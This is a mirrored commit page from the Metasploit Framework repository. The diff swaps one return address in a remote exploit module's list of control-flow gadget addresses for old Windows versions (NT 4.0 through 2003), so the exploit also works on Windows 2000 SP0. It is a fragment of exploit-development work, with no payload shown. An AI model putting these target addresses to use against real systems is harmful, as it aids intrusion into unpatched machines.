mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-11-12 11:52:01 +01:00
Switch to a return address that also works on SP0
git-svn-id: file:///home/svn/framework3/trunk@7849 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
7a5267015e
commit
e02f62e3aa
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
[
|
||||
0x77f33723, # Windows NT 4.0 SP6a (esp)
|
||||
0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0
|
||||
0x0018759f, # Windows 2000 Universal (ebx)
|
||||
0x010016c6, # Windows 2000 Universal (ebx)
|
||||
0x01001c59, # Windows XP SP0/SP1 (pop pop ret)
|
||||
0x001b0b0b, # Windows 2003 call near [ebp+0x30] (unicode.nls - thanks Litchfield!)
|
||||
0x776a240d, # Windows NT 4.0 SP5 (eax) ws2help.dll
|
||||
|
Loading…
Reference in New Issue
Block a user